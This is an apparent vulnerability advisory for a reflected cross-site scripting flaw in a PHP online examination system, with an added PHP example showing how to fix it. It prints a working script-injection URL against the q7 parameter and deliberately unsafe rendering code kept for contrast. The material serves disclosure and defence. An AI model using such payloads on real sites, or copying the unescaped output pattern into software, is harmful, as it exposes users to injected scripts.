# Exploit Title: Online Examination System - Cross site scripting Reflected
# Google Dork: N/A
# Date: 2022-9-29
# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11
# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-examination/
# Software Link: https://github.com/projectworlds32/online-examination-systen-in-php/archive/master.zip
# Tested on: Windows 11 - XAMPP
# CVE : N/A
# Version: 1.0

Vulnerability Details
======================

Steps :

Vulnerable code in file index.php:

157 '.@$_GET['q7'];}?>

http://localhost/examination/index.php?q7=%22%3E%3Cscript%3Ealert(%22yousef%22);%3C/script%3E

Inject the payload into parameter q7.
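
Mitigation for the pattern reported above is to encode the value at the point of output. The following PHP is an added example, not code from the advisory or the project: the function names and the surrounding `<div>` markup are assumptions, since the advisory shows only that `$_GET['q7']` is concatenated into the page.

```php
<?php
// Added example. Function names and the <div> markup are hypothetical;
// only the q7 parameter and the query string come from the advisory.

/** Vulnerable pattern: request value concatenated into HTML unescaped. */
function render_unsafe(array $query): string
{
    $q7 = $query['q7'] ?? '';   // ?? replaces the @ notice suppression
    return '<div class="msg" title="' . $q7 . '">' . $q7 . '</div>';
}

/** Hardened pattern: encode for the HTML context when writing output. */
function render_safe(array $query): string
{
    $q7 = $query['q7'] ?? '';
    if (!is_string($q7)) {
        // A request such as q7[]=x arrives as an array; treat it as empty.
        $q7 = '';
    }
    // ENT_QUOTES encodes both quote styles, so the value cannot close an
    // attribute; ENT_SUBSTITUTE replaces invalid UTF-8 instead of
    // returning an empty string.
    $q7 = htmlspecialchars($q7, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<div class="msg" title="' . $q7 . '">' . $q7 . '</div>';
}

// Query string taken from the proof-of-concept URL in the advisory.
parse_str('q7=%22%3E%3Cscript%3Ealert(%22yousef%22);%3C/script%3E', $query);

$unsafe = render_unsafe($query);
$safe   = render_safe($query);

echo "unsafe: $unsafe\n";
echo "safe:   $safe\n";

// Regression check: the encoded output must contain no raw tag or quote
// taken from the parameter value.
if (strpos($unsafe, '<script>') === false) {
    throw new RuntimeException('expected the unsafe render to reflect the tag');
}
if (strpos($safe, '<script>') !== false || strpos($safe, '"><') !== false) {
    throw new RuntimeException('encoded output still contains raw markup');
}
echo "encoding check passed\n";
```

The same check can be kept as a regression test for every place `index.php` echoes a request parameter, so that a later edit that drops the encoding fails immediately.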